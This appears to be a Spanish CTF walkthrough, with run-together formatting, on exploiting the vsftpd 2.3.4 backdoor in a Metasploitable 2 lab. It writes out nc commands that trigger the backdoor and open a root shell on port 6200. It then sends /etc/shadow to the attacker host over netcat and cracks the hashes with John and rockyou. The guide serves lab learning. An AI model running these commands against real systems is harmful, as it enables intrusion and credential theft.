
Guía paso a paso de CTF que explota la puerta trasera de vsftpd 2.3.4 (CVE-2011-2523) para capturar y descifrar /etc/shadow y /etc/passwd de Metasploitable 2.
Captura los archivos /etc/shadow y /etc/passwd descifrados del servidor vulnerable Metasploitable 2.
Para este CTF, utilizamos VMware Workstation Pro con dos máquinas virtuales. Usamos Kali Linux como la máquina del atacante y Metasploitable 2 como la máquina vulnerable.
Open a Virtual Machine en VMware Workstation y seleccione el archivo de Kali Linux descomprimidoopen, luego seleccione el archivo Metasploitable 2 descomprimidoPlay virtual machine en ambas máquinas virtualesI moved It o I copied It, seleccione la opción I copied Itkali como nombre de usuario y contraseñamsfadmin como nombre de usuario y contraseñaip addr show y registre la dirección IP de la sección inetMassachusetts Institute of Technology Research and Engineering detallan CVE-2011-2523 como una vulnerabilidad y exposición común donde vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp.
nmap <vulnerable-machine-ip-address>nc <vulnerable-machine-ip-address> 21:), introduzca user <string>:)pass <string> nc -v <vulnerable-machine-ip-address> 6200ip addr showwhoami/etc/shadow y /etc/passwd a otro archivocp /etc/shadow shadow.txtcp /etc/passwd passwd.txtinet usando el comando ip addr shownc -l -p 1234 > shadow.txt en la máquina del atacantenc -w 3 <destination-ip> 1234 < shadow.txtJohnunshadow passwd.txt shadow.txt > unshadowed-inputcat unshadowed-input; debe contener el nombre de usuario y la contraseña almacenadosJohn y la lista de palabrasrockyou.txt para descifrar los hash usando johnsudo gzip -d /usr/share/wordlists/rockyou.txt.gzkalijohn unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txtjohn –show unshadowed-input